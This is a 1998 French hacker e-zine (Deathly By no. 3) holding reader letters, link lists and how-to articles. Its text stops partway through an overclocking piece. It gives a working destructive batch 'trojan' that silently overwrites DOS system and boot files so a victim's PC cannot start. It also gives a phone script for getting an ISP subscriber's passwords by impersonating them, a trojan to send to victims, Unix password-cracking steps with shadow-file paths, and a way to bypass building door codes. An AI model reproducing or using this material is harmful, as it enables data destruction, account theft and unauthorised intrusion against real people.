|    Décembre 1998      -- DeAtHlY-bY mAgAzInE 3       --  Final Version                       |
|                                                                77                            | 
|                                                              77                              |
|   ÜÜÜÜ    ÜÜÜÜÜÜ    ÜÜÜ     ÜÜÜÜÜÜÜÜ  ÜÜ     Üá   ÜÜ     ÜÜ    ÜÜ                            |  
|   ²   ²   ²        ²   ²       ²²     ²²     ²²   ²²     ²² 77 ²²                            |  
|   ²   ²   ²       ²     ²      ²²     ²²     ²²   ²²      ²²  ²²                             |      
|   ²   ²   ²²²²   Í²²²²²²²=     ²²     ²²²²²²²²²   ²²    77 ²²²²                              |     
|   ²   ²   ²       ²²   ²²      ²²     ²²     ²²   ²²  77    ²²                               |    
|   ²   ²   ²       ²²   ²²      ²²     ²²     ²²   ²²77      ²²                               |    
|   ²²²²    ²²²²²²  ²²   ²²      ²²     ²²     ²²   77²²²²    ²²                               |    
|                                                 77                                           |    
|                                77             77     /\/\/\/\/\/\/\/\/\/\/\                  |    
|                     888         77          77        We Are Here For Your                   |       
|                88888   8         77       77                 Unique                          |      
|                8 ²²   8           77    77                  Pleasure !                       |    
|                 8   8              77 77              /\/\/\/\/\/\/\/\/\/\                   |     
|                  8   88888          77                                                       |   
|                   8       888         77                                                     |   
|                    8   ²²  8888         77                                                   |       
|                     8   888               77                                                 |     
|                      888                                                                     |      
|                     												     |        
|															     |	 
------------------------------------------------------------------------------------------------
                                         EDITARD 

Donc nous voila reparti pour le 3 eme n° de Deathlyby encore plus fort que jamais :)
Lisez ce zine avec la résolution 800*600 ou plus, mais pas moins :)
Bon, on va rester un an sur cet EDITARD GO GO GO GO!   
Si vous utilisez Wordpad, mettez le en "retour à la ligne sur fenetre".

ND Fugitif: Ptain on est arrivé au 3 éme N°, on sait meme pas comment on fais....
On attends vos articles par centaines si c'est possible...

------------------------------------------------------------------------------------------------
 
               !VIVE LA DEMOCRATIE, LIBERTES EGALITES FRATERNITES!
                               FUCK OPPRESSION...go to hell!
                               FUCK REPRESSION...go to hell!

------------------------------------------------------------------------------------------------
DiskLamez:  Le texte qui constitue l'essence de ce zine est constitue
d'informations a but EXPLICATIF UNIQUEMENT...

        IL EST STRICTEMENT INTERDIT PAR LA LOI DE LIRE LA SUITE!!!
                        ENCORE MOINS DE FAIRE C'KY A ECRIT!
                             JE NE SUIS PAS RESPONSABLE!!!
                                    SUICIDE MAY CAUSE DEATH  !!!!!!!!

------------------------------------------------------------------------------------------------
                        OFFicierz:

                        HeartWork666
                                 --> HeartWork666@hotmail.com

                        Cedru
                                 -->Cedru13@hotmail.com

                        Fugitif
                                 -->Fugitif@hotmail.com

               
                        Eldre8
                                 -->elre8@cyberdude.com


                        Droopy
                                -->Même email que Cedru (facture trop lourde doit se passer du
                                   net quelques temps encore) Je lui ferais suivre ses messages

				Page Web:

				http://members.xoom.com/deathlyby/ 

				Vous y trouverez des progs, des liens et bien sur les n° du 
                                zine...

------------------------------------------------------------------------------------------------
            

		Rejoignez nous en IrcNet #infonie, #france, #warez-france etc...

On recherche des pros du hack en france, et des pros du phreak de cellulaires
REJOIGNEZ NOUS!
Si vous voulez écrire un article pour DEATHLY BY, n'hésitez pas !
envoyez le à mon Email, je me ferais un plaisir de vous intégrer à l'équipe !

------------------------------------------------------------------------------------------------



************************************************************************************************
                                        Sommmaire

                     -- Service courrier By Cedru
                     -- Les meilleurs sites Web By Cedru
                     -- Les petits trucs de win98 By Cedru
                     -- Lamers Vs Elites By Cedru
                     -- Se faire une connexion à Wanadoo... By Fugitif
                     -- Faire son trojan et son terminal en Delphi 2.0 ou + By Fugitif
                     -- Cracker les passwd de Linux  By Fugitif
                     -- Etre proteger sous Linux By Fugitif
                     -- Le Crashing by îldçeì (Eldre8) 
                     -- L'Overclocking (3DFX et CPU) By Fugitif And Cedru                  
                     -- Une petite bombe dangereuse By Fugitif  
                     -- Hack de VMB initiation By Fugitif 
                     -- Comment fabriquer de faux timbres By Droopy
                     -- EMULATION TERMINAL By Droopy
                     -- Un peu de PHREAKING (EDF) By Droopy
                     -- Insecurite des Autocommutateurs Telephoniques By Admin Telecom X en colère (pHoste)
                     -- Réponse sur l'insécurité et l'incompétence des administrateurs By Cedru                                                        
                     -- Recrute pour un groupe de hacker 
                     -- Recherche fille pour droopy (c'est une blague!! :) ) 
                     -- Les prochains articles et le mot de la fin                      
                     
================================================================================================
                                   Service Courrier
================================================================================================

Viola je vais afficher les courriers intéressants qu'on a reçut!! :)
Je vais y mettre mes réponses et commentaire dans ce service courrier (Cedru)
Bon ok vous allez vous dires,il a copie sur npc!! mais moi je vais pas faire 3/4 du zine pour le
service courrier, mais juste y consacre un peu.
Lorsque j'interviendrais dans la lettre je mettrais NdCedru et je sauterais des lignes pour que
ca se voit bien! 
GOGOGOGOGGOGOGOGOOGGOGOGO!!!!!!!!

Première lettre (venant du créateur de Hvu,wow!!! :) )


Slt Fugitif et toute l'équipe,

je viens de découvrir se chti new emag qui est le vôtre "deathly", et je 
vous félicite pour se 1er numéro qui bien qu'il soit un peu aléatoire 
dans certaines explications a le mérite quand même d'être fait pour les 
newbies ;). Si j'ai un conseille par contre a vous donnez cela serait de 
n'expliquer UNIQUEMENT que des techniques que VOUS avez essayer et 
REUSSI!

NdCedru : On reussi rien!! :) donc on est pas près d expliquer quoi que se soit!! ;)

c'est important car vous pouvez dans le cas ou quelqu'un vous 
dit "sa marche poa, c du pipo" lui montrer "très clairement" en lui 
faisant un schéma comment faire.

NdCedru : J envoi chier tous ceux qui me disent que ca marche pas! ;) comme ca c'est réglé!!

Personnellement sinon je suis très 
heureux de voir, des jeunes apprentis sorcier de l'infor avoir la 
Volonté de faire avancer la Scène française, car elle ne se porte pas 
très bien actuellement, ainsi donc je vous souhaites de tout cœur bonne 
chance :).

NdCedru : Tu me traites d apprenti,wow je vais tout casser!!! :) voir article sur les élites!!

Au passage je vous joints, le p'tit dernier de la série HVU 
mag.. qui j'espère pourra vous être utile dans certaines matières (car 
il s'agit d'un numero un peu particulier, fait pour combler le manque 
d'emag fr).

HEUREUSEMENT, mes espoirs dans la new generation qui est la votre (je 
suis poa trop vieu mais bon..) se trouve justifier maintenant, car je 
croyait être le seul éditeur d'emag fr encore de service. Mais votre 
arrive ainsi que celle de vos collègues du New emag Liberté Underground 
me rassure sur l'avenir! :).

Ndcedru : Mon collègue? moi je le connais pas! :) puis il écrit vraiment des trucs bidon lui
aussi,genre comment rentrer sur le pc de quelqu un et il nous explique encore une fois le système du trojan qui ouvre un port ftp 21.Puis le reste aussi n est pas terrible,puis il nous renvoi même a des adresses ou on le voit en photo avec nom et prénom ! :) Je vais appeler la Dst!!  Il pourrait faire un effort pour la photo, il lui manque que le joint pour faire Bob Marley!!!

Quant a des sujets pouvant intéressait vos lecteurs, ils pourraient 
être sur le :

- le Lock picking
- le trashing

entre trotre..

Sinon parmit les choses que j'ai aime dans votre emag, c'est la liste de 
sites intéressants, les numéros de séries et sur la contre-culture 
qu'est le satanisme.

Vous pourrez sinon rajoutez dans votre prochain numéro, cette page web 
que je trouve très bien faite : wwwperso.hol.fr/~esaracco/

C'est une page LIBERTAIRE! ;)

NB : je vous joins HVU8 et j'espère avoir vos réflexions en bien ou en 
mal sur ce numéro 8.

a+ Apprentis Sorciers et collègues! ;)

NdCedru : Argh je suis pas un apprentis sorciers mais un super hackers de la mort!!!!
73

LaRsEn

"Les Auteurs d'emag,zine,feuille volante sont le véritable moteur de la 
Scène Underground, sur nos épaules repose l'espoir d'un combat se 
nommant LIBERTE !"

NdCedru : Je sais! Pas de photo s'il vous plaît!! Voilà maintenant on est des super star et je
veux pas de comparaison avec BobMarley et son zine Liberté Underground.Il est seul et puis son
zine a du disparaitre,seul il peut pas aller très loin.


2eme Lettre

votre site de hacking est vraiment pourri
c mélange de hacking ressources, crackz, appz et, serialzca put quoi......
faudrait essyer de mieux faire les enfants
regarder comment est fait web3.hackersclub.com par exemple
ca c un vrai site, bien fait, de hacking

NdCedru : C'est pas un site de hacking ,mais un site pour mettre notre mags.On a eu
la gentillesse de vous mettre quelques programmes pour hackers, et voilà comment on se fait
remercier! ;)
NdFugitif : Non c'est pas site de hacking...

3eme Lettre

Salut g 13 ans je m'appelle emilie !
J'ai découvert ton groupe de hackerz dans l'émission Fan de 
de samedi dernier !

Je vous trouve tous très sexy bref je suis une fan !!!

pourrais je recevoir une foto dédicacée ?
Ps : heartwork est bocoup plus bo que cedru !!!!!!

NdCedru : Voilà un délire de Heartwork ancien membre de notre groupe qui est a la retraitre! ;)
,mais bon il écrira defois quand il aura le temps entre 2 siestes!

4eme Lettre

j'ai lu ton super mag,comment se ser ton de cyberphreak ?
peut tu me refiler une pbx 080090 avec le code j'ai du mal avec l anglais

NdCedru : Je suis pas le service charité!!! Je vais pas vous donner mes pbx !! ;) en plus j en ai même pas a vous passe, ca grille trop vite! ;)


5eme Lettre

Salut mec.J'ai lu ton zine...
Ouais, pas mal, à part une tit' chose : quand tu expliques comment
rentrer dans le DD de qqn, tu dis que tu t'es inspiré du zine "fantom"...
Ben petite précision, ayant des potes du feu MJ13, je peux te dire une
chose : ce zine n'en est pas un en fait, c'est Phantom (le célèbre
cracker) qui a écrit cette tit' doc pour son ami Thorgal, afin qu'il
infiltre des DD...C'est tout.

NdCedru : Merci de l'info car je savais pas

Sinon Death est assez inspiré GoGo mAgAzInE je trouve, m'enfin bon...

NdCedru : Mais non!! ou as tu vue joue ca? ;)

allez salut !ps : je possède un graveur depuis 2 mois, j'en suis à mon enième cd
gravé, et je n'ai jamais foiré, même en gardant le wallpaper, c p'têt un
blème de version ça...
Mon site web a 10 francs, profitez en, c'est bien, c'est pas cher, et
c'est meme gratuit!! un site daubesque pour rien ! si ! www.chez.com/actyon
L3S W4rL0RdZ s0nT n0s 4M1s !ReZiZtaNcE iZ FuTiLe !


6eme Lettre

J'ai découvert votre site grâce a playboy sur irc, ami d'une amie, enfin
bref, ce site est génial avec des progs MEGATOPs (ex : sockets23) mais
le premier mailbomb et le generateur de n° CB foire (erreur
téléchargement au bout de 7 ko). Pourriez vous y remédier et me dire
quand ce sera fait ou bien me les envoyer si c'est pas gros.
Je vous dis bravo et merci.
Axel.

Nd Cedru : Pour les programmes il faut le dire a fugitif qui s'occupe de notre site web a 2 fr
Merci pour les compliments! :) Si vous avez des problèmes avec notre site Web allez vous plaindre à : Fugitif@hotmail.com, ou dite le moi pour que j'aille le frapper! ;)

Heart private joke to cedru : Sockets 23 D@z |=uçKin' L0m0H'z app !!! 

Nd Fugitif: Pour les 7 ko, chez moi ca plante pas, ca doit être sa connexion ou son browser... 
Deuxsio c'est pas un site à 2 frs. Troisio on a tellement de lettres de nos fans qu'on peut pas
tous les mettres dans cette rubrique!

7eme Lettre

Salut et félicitations pour votre e-zine qui est absolument génial!
je joins a l'envoie un dossier qui doit contenir des boxes (j'ai pas
encore testé!!!)Pour les digicodes il y a deux solutions:
1: demander à un serrurier (du type clef a la minute) très louche et
assez jeune de vous faire un passe-PTT.c'est la clef qui permet au
postier de débloquer ledigicod pour mettre le courrier dans les boites
qui sont a l'intérieur.
le pass est difficile a trouver mais marche sur 80% des digicods
2: insérer une tige en fer (type des goupilles des extincteurs) dans le
trou du digicod sous les led rouge ou verte.
Voilà a mon avis la première sol est la seule qui marche vraiment;si
quelq'un a dega la clef il peut la scanner et on la reproduira sur du
plastique qui servira de modèle pour la machine a clef-minute.d'avance a bientot
répondre sur ???????? censurer!!!!
ps: dans une grande ville il ne doit pas être difficile de trouver un
serrurier suffisamment chelou et dégoûté de la vie pour accepter de vous
faire un pass.

NdCedru : Merci bien pour l'astuce!! :)

================================================================================================
                           Les meilleurs site Web    By Cedru
================================================================================================

Un très bon site avec plein de ressources (programmes de hack,mags dont le notre aussi! :)...)
http://wwwperso.hol.fr/~esaracco/


Une secte! :) allez vous marrer la bas
http://www2.cruzio.com/~flower/francais.html


Un site daubesque pour rien ce qu'affirme son auteur! :) (humour au rendez vous! )
http://www.chez.com/actyon/


Un site avec plein de ressources (nukers,floder,spoofing...) en anglais
http://www.antionline.com/

Le fameux site du zine 2600  pour les hackers (américain)
http://www.2600.com/mindex.html

Un site excellent tout en dentelle (attention, c du second degré...quoique!)
http://www.mygale.org/~azerty0



================================================================================================
                                 Les Petits Trucs de Win98 By Cedru
================================================================================================

Voilà dans cet article je vais regrouper les petits utilitaires pratiques pour hackers qui
sont obligatoirement sur votre disque dur.

Allez dans votre répertoire windows et vous allez des programmes comme :

Nbtstat : Celui la permet de rentrer sur le pc de quelqu un qui a les ressources partages, voir
l article dessus dans le numéro 1 de deathly by.

Netstat : Il permet de savoir les vrai Ip des personnes qui vous aurez contacter par exemple sur
icq, si vous sniffer son port vous risquez d'avoir une adresse ip qui a été spoofer (c est a dire une fausse adresse ip) alors qu avec ce programme vous savez exactement l adresse ip du mec. Pour l'utilisation débrouillez vous avec le menu help de netstat, faite netstat -à pour le menu help.Merci qui? ;)

Ftp : Ceci vous permet d entrer sur l'ordinateur de quelqu un si il a son port ftp d'ouvert
vous tapez sous msdos, ftp et ca va vous ouvrir la cession après tapez help pour pouvoir avoir
le menu des commandes affichées
Apres faite Open ???.???.???.??? <--- adresse ip de la victime et vous pouvez entrer sur la
bécane du type avec cette méthode, si la personne a bien son port ftp 21 d'ouvert! :)
Tapez dir pour voir le contenu du son disque dur et pour le reste débrouillez vous...
Bon je vais vous aider après vous allez pleurer sur mon email!!!
bon tapez help vous obtenez ceci (je vous donne des petites explications en face)


Je n ai pas tout mit ne sachant pas tous les fonctionnalités du ftp sous dos

!            C'est des renseignements sur les droits de propriété du programme,rien a foutre! :)
?            Menu Help
ascii        Vous fait passer en mode Asci
bell         Vous permet d'active le mode sonore ou pas
binary       Vous fait passer en mode binaire
bye          Vous ferme votre programme Ftp
cd           Permet de changer de repertoire
close        Ferme votre connection sur la cible
delete       Efface un fichier (delete + nom du fichier)
debug        Active le débogage
dir          Vous affiche le contenu d'un répertoire
disconnect   Vous deconnecte de la cible
get          Permet de recuperer le fichier de la cible
glob         Active l'extension metacaractere
hash         Impression de la marque du hachage activé
help         Menu Help
lcd          Accede au dossier local C:\windows
open         Vous ouvres la connection sur la cible (rentrer son Ip)
quit         Vous revenez a votre racine
recv         Vous recevez le fichier cibler
rename       Renome un fichier (ca peut etre marrant de renomer des trucs secrets)
send         Envoi un fichier



Telnet : Vous permez d'entrer sur un serveur ou le pc de quelqu un en passant par le port telnet
c est un peu le même principe que ftp! mais c est pas le même port,voir l article numéro 2 pour la liste des ports...
N'oubliez pas d'aller dans terminal puis dans préférences et de cocher echo local pour voir ce
que vous écrivez.


================================================================================================
                                Lamers Vs Elites By Cedru 
================================================================================================

Voilà dans cet article je vais vous parler de la mentalité des internautres en générale qui
affirment à tour de rôle qui sont les meilleurs et les plus beaux, comme dans la vraie vie en
faite!!!! Vous pensiez aller sur le net pour trouver des gens intéressant et vous tomber sur
les mêmes gens de tous les jours qui ne savent que parler d'eux!!!
Voilà la première impression que j ai eu en étant sur le net, mais je ne parle que de 90%
des gens que j ai rencontre.
Débutant = Lamers
Pro = élites
Voilà vous êtes classe sûrement dans une des 2 catégories. 
Il n y a pas de juste milieu sur le net ou tu sais tout ou tu ne sais rien !  : ) bizarre non??
Je vais de temps en temps sur Irc et j ai rencontre des gens qui péter plus haut que leur cul
en affirmant me planter mon pc si je le faisais chier (wow tu as le dernier winuke a la mode )
puis on a les élites qui ne savent pas grand chose de plus (wow tu sais utiliser le socket de
troie!!! )les vraies élites ne passent rarement dans de gros forums et sont plutôt dans les
forums privés.Si vous voulez bien m inviter dans les fameux forum pour
élite moi je veux bien !!  :)
Snif!!!! personne veut de moi ! 
Je suis exclu de la grande famille du net! : ) 
Pour vous faire une meilleure idée des élites et lamers allez sur http://www.mygale.org/~azerty0
Putain je sais pas quoi mettre dans le reste de l article, après être passe sur le site tu sais
pas quoi mettre pour le completer.Ce que je dirais pour le mot de la fin c est de jamais se
surestimer et toujours se sous-estime! :) comme ca vous avez pas de mauvaise surprise si on
vous juge.


================================================================================================
                         Se faire une connexion à Wanadoo By Fugitif
================================================================================================


Bah, la on va faire appel au social, mais c'est une méthode toute simple.
On va demander les mots de passe d'une personne, en se faisant passer pour elle.
Donc, il vous faut le nom, le prénom, l'e-mail (voir l'âge et l'adresse).
Comment trouver ca?
Allez sur une Home Page Personnelle d'un connard qui raconte sa vie et puis qu'en plus
il met son nom dessus... Puis faites votre recherche pour trouver ses passes.

Appelez le service technique de Wanadoo (0803833313).
Une pute vous dite qu'elle va vous mettre en ligne avec un technicien.

Le technicien vous parle:
tech : Service Blabla bla , bonjour, à vote service?
Toi  : Bonjour, je vous appelle car suite à un demenagment, j'ai perdu   
       ma feuille Wanadoo, contenant mes mot de passes de connexion, et mon N° d'utilisateur.
       Je suis très pressé...
tech : Il me faudrait votre nom.
Toi  : Oui, je suis Blabla.
tech : Alors, préparez vous à noter, voici l'identifiant de connexion.... le mot de passes...

Voilà l'affaire, biensur essayer de faire un texte plus élaboré.

Maintenant vous n'avez plus qu'à vous connecter avec votre abozz.

NdCedru : ça marche??? car chez wanadoo ca rigole pas! :)


================================================================================================
             Faire son trojan et son terminal en Delphi 2.0 ou +  By Fugitif
================================================================================================


Voilà, j'ai joint les sources d'un début de "Socket de troie" fait par moi même, biensur 
je n'ai pas  fait complet car sinon il y a des petits rigolos, qui changent un peu 
les boutons et  qui disent que c'est eux qui l'ont programmé. Celui que j'ai mis est 
libre de droits.
J'ai pas trop eu le temps de commenter les sources.

Les sources sont dans le fichier hack.zip.

C'est un programme tout simple avec un terminal et un trojan, avec les options suivantes:
- Rebooter
- Message
- Imprimer
- Exécuter

Pour le reste se sera à vous de le compléter et de le programmer.
L'installation du composant socket est nécessaire pour la compilation du prog, j'ai joint
dans le zip ce composant et aussi le composant winreg, pour l'infection de la base des
registres.

Dezziper le zip hack.zip avec l'option des dossiers:

Les 2 composants se situent dans le dossier composant du zip.

Comment installer un nouveau composant?
- Dezzipez le fichier socket.zip contenu dans trojan.zip dans un dossier qui ne changera pas.
- Allez sous Delphi. Menu Composant/Installer, ensuite Ajouter puis parcourir, choisissez dans
  votre dossier le fichier socket.pas, ensuite Ok et Ok.
- Voilà le nouveau doit être normalement ajouter dans la palette des composants.

Faites la même chose pour winreg.pas.

Ensuite ouvrez la source que vous voulez et contemplez les sources qui sont évidemment
commenté.

Dans le dossier client: C'est terminal que vous utilisez.
Dans le dossier serveur : C'est le trojan à envoyer à la victime.

Biensur faut compiler....

En fait le trojan contient toutes le fonctions qui sont nommer, le terminal lui envoie-la
fonction au trojan (qui est en fait un serveur caché) et l'exécute.
Prenons exemple sur la fonction Reboot. Le terminal envoie la donné Reboot au trojan, qui
va regarder dans ses fonctions et trouver une fonction reboot qui va se lancer et donc 
rebooter l'ordinateur.

================================================================================================
                             Crackez les passwd  By Fugitif
================================================================================================


Vous avez trouver un passwd no shadow et simplement crypté?
Ben maintenant il faut le décrypter.

Vous avez deux solution, soit d'utiliser un brute force , soit un dico.
Chez moi le décryptage avec dico est plus rapide, mais il faut des gros dicos.

Pour faire un dico, je vous conseille d'utiliser, ou Dictmaker, ou Jill qui tous deux
des bons générateur de dico.

Si vous avez beaucoup de place sur le HD, n'hésitez pas à opter pour la méthode dico,
n'hésitez à pas faire des dictionnaire de 200 mo chacun, par exemple faites:

- Dico 6 lettres, minuscules après majuscules, ensuite nombre, puis caractères ascii.
- Dico 7 lettres, minuscules après majuscules, ensuite nombre, puis caractères ascii.
  Et ainsi de suite jusqu'à au moins 15.

Maintenant que vous avez bourrer votre hd de dico, il faut un cracker, je vous conseille ceux
ci:
- Cracker Jack.
- John the ripper.

Si au contraire, vous avez pas beaucoup de place sur le hd, faites du brute force.
Il y a plusieurs aussi comme:
- Bruteforce 2.0
- NT crack (pour win 95/nt)
- .....

Un brute force ca prends énormément de temps, donc si vous avez une machine qui traîne
mettez le cracker en route dessus, car le crack d'un passwd sur brute peut durer plusieurs
jours, semaine, voir mois selon la machine.

Si il y avait un X ou une * à la place du passe, c'est qu'il serait en shadow, vous pouvez 
quand même essayer de l'obtenir car il se cache dans d'autre dossier, essayez ceux la:

UNIX System Type:               Path:                                        Token:

AIX 3                           /etc/security/passwd                               ! 
or                              /tcb/auth/files/<first letter of                   #    
                                username>/<username>
A/UX 3.Os                       /tcb/files/auth/                                   *
BSD4.3-Reno                     /etc/master.passwd                                 *
ConvexOS 10                     /etc/shadpw                                        *
Convex0S 11                     /etc/shadow                                        *
DG/UX                           /etc/tcb/aa/user                                   *
EP/IX                           /etc/shadow                                        x
HP-UX                           /.secure/etc/passwd                                *
IRIX 5                          /etc/shadow                                        x
Linux 1.1                       /etc/shadow                                        *
OSF/1                           /etc/passwd[.dir|.pag]                             *
SCO UNIX #.2.x                  /tcb/auth/files/<first letter of                   *
                                username>/<username>
SunOS 4.1+c2                    /etc/security/passwd.adjunct                       ##
SunOS 5.0                       /etc/shadow                                        
System V 4.0                    /etc/shadow                                        x
System V 4.2                    /etc/security/* database                   
Ultrix 4                        /etc/auth[.dir|.pag]                               *
UNICOS                           /etc/udb                                          *

Voila! :)


================================================================================================
                             Etre protéger sous Linux   By Fugitif
================================================================================================

Je vais vous donner 4 conseils :

- Fermez ses ports : Configurer le fichier inedt.conf dans /etc/, virez tout en commentaire.
- Bien choisir son password , disons un pass contenant : majuscules, minuscules, chiffres, 
  caractère ascii.
- Downloadez un prog pour rendre shadow votre passwd.
- Downloadez un firewall (quoique?).

Vla, je vais y passer une éternité pour 2 mots....

Sinon si vous voulez tous les exploits inimaginables pour vos hacks allez faire un tour sur:
www.rootshell.com

Ndcedru : vite fait cet article! :) tu m'as battu pour celui la, au prochain numero je suis
sur que je vais réussir à te battre et en faire un avec le titre et 1 phrase après.
Tu fais mieux, hein?? :)

================================================================================================
                             Le Crashing by îldçeì (Eldre8)                        
================================================================================================

Mais me direz-vous, POURQUOI EST-IL AUSSI MECHANT ?
                Non, pas méchant, curieux, et puis bon !!!
Je vais donc vous expliquer comment faire planter la machine de quelqu'un en
lui envoyant un batch (s'il est assez débile pour le lancer) ou un com!
Le batch est facile a realiser mais le com?
        Et bien avec un utilitaire qui transforme un batch en com pour ceux
        qui ne savent plus programmer! Je passerais l'aspect com car si
        ceux d'entres vous savent programmer, ce sera un jeu d'enfant de faire
        ca!
Commençons par le début du batch :
        @ECHO OFF             ;pour que les commandes du batch ne se voient pas
        ATTRIB -R -S -H C:\*.* ;pour voir les fichiers system
        COPY BIDULE.XXX IO.SYS           ;pour effacer
         idem avec MSDOS.SYS
         idem avec COMMAND.COM

La, le batch va demander la permission de tout effacer, nous on veut pas qu'il
y est quelconque demande a l'utilisateur! Nous integrons donc /Y
        @ECHO OFF             ;pour que les commandes du batch ne se voient pas
        ATTRIB -R -S -H C:\*.* ;pour voir les fichiers system
        COPY BIDULE.XXX IO.SYS /Y        ;pour effacer s'en demander
         idem avec MSDOS.SYS
         idem avec COMMAND.COM

Oui mais la, l'utilisateur voit quand même toutes les opérations effectuées sur
sa machine! Nous n'avons qu'a faire sortir les caractères vers NUL!
        @ECHO OFF             ;pour que les commandes du batch ne se voient pas
        ATTRIB -R -S -H C:\*.* ;pour voir les fichiers system
        COPY BIDULE.XXX IO.SYS /Y >nul   ;pour effacer s'en demander et
         idem avec MSDOS.SYS                    ;s'en voir
         idem avec COMMAND.COM

La, c'est pas encore assez méchant, l'utilisateur pourrait faire un UNDELETE,
nous devons donc écrire quelque chose sur le disque pour lui rendre la tache
UNDELETE impossible pour cause de cluster utilise (mais pas impossible avec
PCTOOLS)
        @ECHO OFF             ;pour que les commandes du batch ne se voient pas
        ATTRIB -R -S -H C:\*.* /Y >nul     ;pour voir les fichiers system
        COPY BIDULE.XXX IO.SYS /Y >nul   ;pour effacer s'en demander et
         idem avec MSDOS.SYS                    ;s'en voir
         idem avec COMMAND.COM
        ECHO TU T'ES FAIT BAISER !!!! By îldçeì > C:\DUCON!.TXT    ;pour un
                              ;joli texte qui lui rendra Undel impossible

La, c'est GOOOOOOOOD, le mec est vraiment baiser s'il lance le batch(ou com)!
Non seulement il n'aura plus de MSDOS.SYS,IO.SYS,COMMAND.COM,!!! mais en plus
il ne pourra pas les recupere et trouvera un fichier DUCON!.TXT lui donnant
des indices sur les faits du non fonctionnement probable de son ordi!

@ECHO OFF
ATTRIB -R -S -H C:\*.* >nul 'rendre les fichiers sys vulnérables
ECHO BOOOOOOO >1.E8     'met un nouveau fichier texte pour les fichier sys
ECHO OOOOOooo >2.E8     'met un nouveau fichier texte pour les fichier sys
ECHO oooooooo >3.E8     'met un nouveau fichier texte pour les fichier sys
ECHO By îldçeì >4.E8    'met un nouveau fichier texte pour les fichier sys
COPY 1.E8 C:\IO.SYS /Y >nul  'ecrase IO.SYS avec le texte 1.E8
COPY 2.E8 C:\MSDOS.SYS /Y >nul
COPY 3.E8 C:\COMMAND.COM /Y >nul
COPY 4.E8 C:\CONFIG.SYS /Y >nul
COPY 4.E8 C:\AUTOEXEC.BAT /Y >nul
ECHO TU T'ES FAIT BAISER !!!! By îldçeì >C:\DUCON!.TXT 'Empeche vraiment UNDEL

Nous voilà donc avec un méchant petit cheval de troi en batch!
Bien sur il est de votre devoir de le modifier et de l'améliore,
je le laisse en domaine publique!
A part ca le language(?) batch n'a pas grand intérêt, ce sera donc mon seule
article dessus!

NdFugitif : Pour le prog de conversion, faut lui demander par mail...

================================================================================================
                        L'Overclocking (3DFX et CPU) By Fugitif And Cedru               
================================================================================================

Overclocking: overclocker c'est bidouiller son processeur pour qu'il aille plus vite,
mais ca ne s'arrête pas la, on peut même accélérer les cartes vidéo , tel qu'une 3dfx etc etc..

cpu : microprocesseur.

Un jour en lisant une revue avec un article sur l'overclocking, j'ai commencé à overclocker
mon Cyrix 6x86 150 + en fait c'est une appellation commerciale car les Cyrix tournent moins vite
que leurs noms pour exemple:
Cyrix 6x86 150 + = P intel 120
Cyrix 6x86 166 + = P intel 133
Cyrix 6x86 200 + = P intel 150

Mais les Cyrix ont un autre inconvénient, il chauffe très chaud et très vite...
Etant le possesseur d'une carte mère ASUS P/I-P55T2P4 (un peu barbare le nom :)), j'ai pus 
très facilement overclocker mon 150+ en 200+, c'est à dire que maintenant il tourne à 150 Mhz
au lieu de 120 Mhz, il y a quand même une différence. A ce point mon processeur ne chauffe pas
trop vite. Si vous voulez overclocker un Cyrix plus haut, l'acquisition d'un système de
refroidissement ne ferai pas de mal au processeur. Je pourrai monter mon cpu à 200 Mhz mais
je préfère m'arrêter la...

Dans les cpu , il y a un multiplicateur, cet à dire qu'il multiplie par ? votre fréquence de
bus externe, par ex:

Penthium Intel 120 Mhz : Multiplicateur : 2, fréquence externe: 60
60 x 2 = 120 Mhz = Fréquence Interne

Penthium Intel 133 Mhz : Multiplicateur : 2, fréquence externe: 66
66 x 2 = 132 Mhz = Fréquence Interne

Penthium Intel 166 Mhz : Multiplicateur : 2.5, fréquence externe: 66
66 x 2.5 = 165 Mhz = Fréquence Interne

Cyrix 6x86 166 + : Multiplicateur : 2, fréquence externe: 66
66 x 2 = 132 Mhz = Fréquence Interne

Vous avez maintenant compris que la fréquence Interne et le résultat du produit: 
fréquence externe * multiplictateur

La fréquence externe du cpu est déterminée dans la carte mère. Il est donc possible
d'augmenter cette fréquence en "bidouillant" la carte mère.
Dans mon cas j'ai mis la fréquence externe à 75 Mhz et laissant le multiplicateur à 2
tel qu'il était d'origine. Donc ca a donné 75 x 2 = 150 Mhz, d'origine c'était : 
60 x 2 = 120 Mhz. La je vous explique la théorie on va passait à la pratique.
Sachez que la manipulation est différente dans chaque carte mère et selon le processeur.
Il y a certaine carte mère ou l'on peut changer les paramètres directs to bios.

Si vous voulez commencer à overclocker votre pc, prenez le manuel de votre carte mére.
Referez vous dans le sommaire et chercher la rubrique : Jumpers, ensuite dans Jumpers
chercher la rubrique : CPU External Clock (BUS) Frequency selection. 
(mon manuel est en anglais).
Une fois dans cette partie du manuel , il y aura normalement le n° des Jumpers servant à
la selection de la fréquence externe. Dans mon cas, Jp8 , Jp9 et Jp10. 

Jumpers: Les Jumpers sont des petits rectangles (il sont bleu chez moi et font 1 ou 2 mm 
de large, 3 mm de haut), on peut donc bouger ces petits rectangles dans plusieurs positions.
Un jumpers prend deux pointes dans un emplacment , schema:
 _                                _
|o|       o = pointe   Jumper =  | |
|-|                              |-|
|o|                              | |
|_|                              |_|
 o                       

Donc, le jumper s'enfonce dans dans emplacement à pointes.
Generalment dans le manuel, il y a un plan de la carte mére pour situer les emplacements de
jumpers.
Pour déplacer un jumper il faut le tirer minutieusement avec une pince à épiler de préférence
et le remettre dans les pointes désirées.

Je regarde dans mon manuel, et il me montre les fréquence possible, dans mon cas, il y a
trois emplacements de trois pointes et trois jumpers, dans le manuel , il me dise qu'il
y a 5 fréquences externes possibles (50,55,60,66,75 mhz), d'origine c'était comme ca:

60 Mhz =
 _  
|o| o  o
|-||-||-|
|o||o||o|
|_||-||-|
 o |o||o|                      
    -  -

Pour le transformer en 75 Mhz, il faut le placer comme ceux ci dans mon cas:
 _     _
|o| o |o|
|-||-||-|
|o||o||o|
|_||-||_|
 o |o| o                      
    -  

Regarder dans votre manuel comme les positions à changer. Choisissez celle qui vous convient
le plus.
Inutile de vous dire que pour accéder à votre carte mère il faut démonter l'ordi.
Une fois changées à la fréquence externe voulue, démarrez votre pc, faites une pause dans
le bios pour si ca a bien fonctionner.
Chez moi ca fonctionner du premier coup. Voilà votre pc overclocker.
Vous pouvez aussi changer le multiplicateur c'est à dire l'augmenter, mais ceux ci implique
une manipulation au niveau du voltage, de plus sur les nouvelle carte mère, le multiplicateur
est protéger contre l'overclocking.Et puis après ca chauffe trop.

Pour refroidir votre cpu, il existe plusieurs progs qui peuvent réduire de 10° la température
